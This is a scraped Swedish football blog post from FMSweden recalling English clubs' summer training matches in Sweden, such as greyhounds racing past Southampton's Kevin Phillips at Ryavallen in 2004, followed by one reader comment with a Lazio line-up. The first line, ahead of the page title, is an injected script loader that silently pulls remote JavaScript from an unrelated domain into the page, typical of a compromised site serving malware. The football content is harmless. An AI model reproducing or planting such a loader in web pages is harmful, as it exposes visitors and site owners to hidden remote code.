;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Två hundar och Kevin Phillips – FMSweden
Meny Stäng

Fabbes blogg: Två hundar och Kevin Phillips

En blogg om engelska lags träningsläger i Sverige som tyvärr verkar vara ett minne blott.

Två Greyhound-hundar flyger iväg i en sjuhelsikes fart över Ryavallens gräsmatta. På ena planhalvan står Southamptons Kevin Phillips och stretchar inför att hoppa in i andra halvlek, lyckligt ovetandes om vad som är påväg att hända. Två sekunder senare flyger Phillips upp när hundarna springer förbi, och jag har nog aldrig sett en så rädd person i hela mitt liv.

Historian är från en träningsmatch mellan Elfsborg och Southampton sommaren 2004. Jag var på plats på Ryavallen med min Elfsborgs-hatt och kollade storögt in James Beattie på topp hos gästerna från södra England. I halvtid förkunnade speakern att dagens matchsponsor, Greyhoundpark i Borås, skulle arrangera ett lopp mellan två hundar. Från ena hörnflaggan, tvärs över planen, till den andra var tanken att hundarna skulle göra upp vem som var snabbast. Speakern bad avbytarna att lämna planen, men glömde den lilla detaljen att ta det på engelska och resten är som man brukar säga historia. Frågan är om inte Phillips än idag drömmer mardrömmar om hundarna med munkorg som kom i 60 knyck rakt emot honom.

Anekdoten ovan är från en tid då engelska lag ofta lade sina träningsläger i Sverige. Jag har varit på plats och sett IFK Värnamo-Southampton och brottat mig fram för att få Anders Svenssons autograf på min nya Southampton tröja, Oddevold-Crystal Palace och gjort give-me-five med Shefki Kuqi på innerplan efter matchen och Gällstad-Reading där en ung Shane Long dominerade. Detta är bara några av de matcher engelska lag har gjort på svensk mark, och som var en av mina absoluta höjdpunkter under somrarna, och jag kommer alltid vara tacksam att mina föräldrar körde runt mig i Västsverige för att titta.

Så nu undrar jag således om era bästa minnen från lag som varit på träningsturné i Sverige. Har ni sett Plymouth i Umeå? Har ni någon historia likt min om Kevin Phillips där världsstjärnor (nåja) möter svensk lokalfotboll? Berätta i kommentarerna. Jag vill veta allt!

——————————————

Nuförtiden är det cashen som måste in för lagen, och allt fler väljer Asien för sin sommarturné. Tråkigt!

——————————————

Det var allt för denna veckan. Vi hörs!

Please wait...

Liknande Inlägg

5 kommentarer

  1. Peter Hecktor

    Haha, underbart! Själv minns jag väl när jag på Ullevi såg GAIS-Lazio.

    Googlade upp Lazios startelva, en del sköna lirare ändå:
    LAZIO: Peruzzi (46′ Marchegiani), Pancaro (46′ Gottardi), Couto, Mihajlovic (46′ Colonnese), Pesaresi (70′ Santarelli), Stankovic (46′ Lombardo), Baronio, Nedved (70′ Luciani), De La Peña, Inzaghi (46′ Ravanelli), C.Lopez (70′ Berrettoni). Allenatore: Eriksson.

Lämna ett svar